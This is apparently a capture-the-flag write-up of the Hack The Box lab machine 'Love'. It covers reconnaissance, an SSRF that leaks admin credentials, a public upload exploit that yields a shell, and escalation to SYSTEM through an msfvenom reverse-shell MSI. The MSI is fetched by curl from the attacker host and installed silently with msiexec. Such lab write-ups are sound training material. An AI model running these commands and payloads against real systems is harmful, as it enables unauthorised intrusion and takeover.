Pages

Search

HTB Love

$ nmap -A -p- 10.10.10.239 -T4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 05:02 EDT
Nmap scan report for 10.10.10.239
Host is up (0.041s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-07-27T09:27:36+00:00; +21m33s from scanner time.
| tls-alpn: 
|_  http/1.1
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=7/27%Time=60FFCBCE%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.7'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h06m33s, deviation: 3h30m01s, median: 21m32s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-27T02:27:23-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-27T09:27:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.62 seconds

Open ports:

  • 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
  • 135/tcp open msrpc Microsoft Windows RPC
  • 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  • 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
    • ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
  • 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
  • 3306/tcp open mysql?
  • 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
  • 5040/tcp open unknown
  • 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 49664/tcp open msrpc Microsoft Windows RPC
  • 49665/tcp open msrpc Microsoft Windows RPC
  • 49666/tcp open msrpc Microsoft Windows RPC
  • 49667/tcp open msrpc Microsoft Windows RPC
  • 49668/tcp open msrpc Microsoft Windows RPC
  • 49669/tcp open msrpc Microsoft Windows RPC
  • 49670/tcp open msrpc Microsoft Windows RPC

http://10.10.10.239

$ whatweb 10.10.10.239

http://10.10.10.239 [200 OK] Apache[2.4.46], Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27], IP[10.10.10.239], JQuery, OpenSSL[1.1.1j], PHP[7.3.27], PasswordField[password], Script, Title[Voting System using PHP], X-Powered-By[PHP/7.3.27], X-UA-Compatible[IE=edge]

Taking into account what we found in the port scanning:

commonName=staging.love.htb

We can add that names to the host file:

$ sudo nano /etc/hosts

10.10.10.239    love.htb
10.10.10.239    staging.love.htb

http://staging.love.htb/

http://staging.love.htb/beta.php

Using http://localhost, this site seems to perform an HTTP request from within the network.

So, as port 5000 was blocked from the outside we maybe can access using this procedure.

We’ve discovered admin credentials.

Using them on http://love.htb/admin we get:

https://www.exploit-db.com/exploits/49445

$ python 49445.py

Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully

$ sudo nc -lnvp 8888

[sudo] password for kali: 
listening on [any] 8888 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.239] 58218
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>

C:\Users>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users

07/27/2021  06:02 AM    <DIR>          .
07/27/2021  06:02 AM    <DIR>          ..
04/12/2021  03:00 PM    <DIR>          Administrator
07/27/2021  06:02 AM    <DIR>          backdoor
04/21/2021  07:01 AM    <DIR>          Phoebe
07/27/2021  06:03 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,967,598,592 bytes free

C:\Users>whoami

whoami
love\phoebe

C:\Users\Phoebe>cd Desktop
C:\Users\Phoebe\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Phoebe\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
07/26/2021  11:35 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,967,586,304 bytes free

C:\Users\Phoebe\Desktop>type user.txt

2a3eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

C:\Users\Phoebe>curl http://10.10.14.7:8000/winPEAS.exe --output winPEAS.exe
C:\Users\Phoebe>winPEAS.exe

WinPEAS execution gives us a clue.

As all installations are performed with elevated privileges, we could use MSFVENOM to create an installer to get a reverse shell.

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.7 lport=9999 --format msi > file.msi

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes

c:\Users\Phoebe>curl http://10.10.14.7:8000/file.msi -o file.msi

curl http://10.10.14.7:8000/file.msi -o file.msi
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  156k  100  156k    0     0   156k      0  0:00:01 --:--:--  0:00:01  768k

c:\Users\Phoebe>msiexec /quiet /qn /i file.msi

msiexec /quiet /qn /i file.msi 

$ sudo nc -lvnp 9999

listening on [any] 9999 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.239] 59789
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>

C:\WINDOWS\system32>whoami

whoami
nt authority\system

c:\Users\Administrator\Desktop>dir

dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\Users\Administrator\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
07/28/2021  07:03 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,070,354,944 bytes free

c:\Users\Administrator\Desktop>type root.txt

710fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *